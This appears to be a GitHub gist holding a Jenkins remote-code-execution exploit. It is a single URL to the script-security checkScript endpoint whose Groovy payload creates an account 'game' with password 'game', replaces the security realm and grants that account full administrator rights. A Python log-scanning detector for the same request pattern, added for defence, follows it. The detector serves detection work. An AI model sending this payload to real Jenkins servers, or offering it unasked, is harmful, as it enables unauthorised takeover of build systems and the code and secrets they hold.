@RedTeams
Forked from akhil-reni/payload
Created July 29, 2019 09:42
Jenkins Metaprogramming RCE Create new user
http://localhost:8080/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript/?sandbox=True&value=import+jenkins.model.*%0aimport+hudson.security.*%0aclass+nice{nice(){def+instance=Jenkins.getInstance();def+hudsonRealm=new+HudsonPrivateSecurityRealm(false);hudsonRealm.createAccount("game","game");instance.setSecurityRealm(hudsonRealm);instance.save();def+strategy=new+GlobalMatrixAuthorizationStrategy();%0astrategy.add(Jenkins.ADMINISTER,'game');instance.setAuthorizationStrategy(strategy)}}
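A detection sketch for this request pattern, added here as an example and not part of the original gist: it scans web access logs for requests to the `checkScript` endpoint shown above and raises the severity when the decoded `value` parameter contains the security-realm calls the script uses. The log format, the sample lines and the function names `inspect` and `scan` are assumptions; only requests whose query string is logged (GET) are visible to it.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint path copied from the URL in this gist.
CHECKSCRIPT = ("/descriptorByName/org.jenkinsci.plugins.scriptsecurity"
               ".sandbox.groovy.SecureGroovyScript/checkScript")

# Class and method names used by the gist's script; matched after URL-decoding.
MARKERS = ("HudsonPrivateSecurityRealm", "createAccount", "setSecurityRealm",
           "GlobalMatrixAuthorizationStrategy", "setAuthorizationStrategy")

# Assumption: combined-log-style request field, "METHOD target HTTP/x.y".
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def inspect(line):
    """Return a finding dict for a checkScript request, otherwise None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    # endswith() tolerates a context-path prefix and a trailing slash.
    if not url.path.rstrip("/").endswith(CHECKSCRIPT):
        return None
    # parse_qs decodes %XX escapes and turns '+' into spaces.
    script = " ".join(parse_qs(url.query).get("value", []))
    hits = [name for name in MARKERS if name in script]
    return {"client": line.split(" ", 1)[0], "markers": hits,
            "severity": "high" if hits else "review"}


def scan(lines):
    """Run inspect() over log lines and keep only the findings."""
    return [f for f in map(inspect, lines) if f]


# Constructed sample log lines (documentation IP ranges, shortened scripts).
SAMPLE_LOG = [
    '203.0.113.7 - - [29/Jul/2019:09:42:00 +0000] "GET ' + CHECKSCRIPT +
    '/?sandbox=True&value=import+hudson.security.*%0anew+HudsonPrivateSecurityRealm'
    '(false).createAccount(%22u%22,%22p%22) HTTP/1.1" 200 12',
    '198.51.100.4 - - [29/Jul/2019:09:43:10 +0000] "GET ' + CHECKSCRIPT +
    '?sandbox=true&value=println+1 HTTP/1.1" 200 12',
    '198.51.100.4 - - [29/Jul/2019:09:43:11 +0000] "GET /api/json HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Any hit on this endpoint from a client that is not an administrator's browser deserves review, even without a marker match, since the script body can be written in many ways.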